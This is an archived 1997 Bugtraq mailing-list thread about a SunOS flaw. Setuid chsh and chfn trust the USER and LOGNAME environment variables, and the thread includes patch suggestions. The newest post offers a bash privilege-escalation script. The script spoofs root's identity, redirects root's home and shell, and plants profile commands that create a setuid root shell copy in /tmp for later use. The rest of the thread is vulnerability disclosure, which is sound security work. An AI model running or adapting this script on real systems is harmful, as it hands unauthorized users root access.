[4516] in bugtraq
No subject found in mail header
daemon@ATHENA.MIT.EDU (Trevor Linton)
Mon May 19 23:25:05 1997
Date: Mon, 19 May 1997 07:19:31 +0000
Reply-To: Trevor Linton <blind@SEDATED.NET>
From: Trevor Linton <blind@SEDATED.NET>
X-To: Nick Simicich <njs@scifi.squawk.com>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.95.970519203108.714O-100000@scifi>
Here's a ruff script to get root, this is more then a algorithm
then a working script but in "theory" will work. This will work
if chsh and chfn is +s'ed. And if they use getenv.
------ CUT ------
#!/bin/bash
#
# Very basic, i need a way to set root shell to /tmp/.tmp
# chfn on some systems will set the directory on some it wont.
# depends.. :\
#
# patch:
# 1) -s both chfn and chsh
# 2) edit the source code for chfn and chsh and remove
# getenv("LOGNAME") and or getenv("USER") and replace
# with getuid(); ..
#
mkdir -f /tmp/.tmp
export USER="root"
export LOGNAME="root"
echo Set the HOME DIRECTORY RIGHT NOW TO /tmp/.tmp
chfn
echo "Set the SHELL TO /bin/bash!"
chsh
echo "cp -a /bin/sh /tmp/.exp" >> /tmp/.tmp/.profile
echo "cp -a /bin/sh /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chown root.root /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chown root.root /tmp/.exp" >> /tmp/.tmp/.profile
echo "chmod a+sx /tmp/.exp" >> /tmp/.tmp/.bashrc
echo "chmod a+sx /tmp/.exp" >> /tmp/.tmp/.profile
echo "Exploit set, wait a day then log back on and execute"
echo "/tmp/.exp to get root, /tmp/.exp is a sh shell when"
echo "root logs in it'll be +s'ed"
-----------------
blind - blind@root.hax0r.org support@hax0r.org
Swingin' Utters. a juvenile product of the working class.
On Mon, 19 May 1997, Nick Simicich wrote:
> Of course, if Bash was changed, I could change them from perl, or a C
> program, and then run bash out of my C program or Perl.
>
> You were right the first time - sdon't trust your environment unless you
> control it.
>
> On Sun, 18 May 1997, Trevor Linton wrote:
>
> > Date: Sun, 18 May 1997 13:36:00 +0000
> > From: Trevor Linton <blind@SEDATED.NET>
> > To: best-of-security@suburbia.net
> > Subject: BoS: SunOS exploit.
> > Resent-Date: Tue, 20 May 1997 09:21:05 +1000 (EST)
> > Resent-From: best-of-security@suburbia.net
> >
> >
> > On sunos, if you execute a clean bash shell then type, export USER="root"
> > then USER=$LOGNAME, then execute chsh root or chfn root you can change
> > the root information.
> >
> > Why?
> >
> > Well first off chsh and chfn are +s'ed. This is a bad idea in the first
> > Place, Second off chsh and chfn use the function getenv("USER") most
> > programs bother to use this instead of geteuid(); getenv("USER") reports
> > that the user is root (while geteuid(); would report the real userid) and
> > then since chsh and or chfn is +s'ed it'll change root's shell user
> > information or ANYONE on the system's information!
> >
> > On the SunOS system i have i've been able to lock out ANYONES shell
> > using this exploit and locking out root's shell as well as changing
> > anyones NAME info in /etc/passwd etc.. etc.. any program that uses
> > getenv("USER") is vunerable (that's in bash). tcsh and some other
> > shells i remember don't allow USER and LOGNAME modifying. :\
> >
> > Anyways here's a rough patch:
> > 1) -s the programs that use getenv(); such as chsh and chfn
> > 2) remove getenv() and replace it with geteuid();
> > 3) possibly get the programmers of bash to fix it so USER and
> > LOGNAME can't be modified unless it's super-user.
> >
> > I'm sure theres a way to get root from this exploit butta.. :) oh well.
> >
> > Trevor Linton (blind) - blind@sedated.net support@hax0r.org
> > Swingin' Utters. a juvenile product of the working class.
> >
> > "People who are having trouble communicating should just shuttup"
> >
>
> Of course my password is the same as my pet's name.
> My macaw's name was Q47pY!3, but I change it every 90 days.
> Nick Simicich mailto:njs@scifi.squawk.com or (last choice) mailto:njs@us.ibm.com
> http://scifi.squawk.com/njs.html -- Stop by and Light Up The World!
>
>
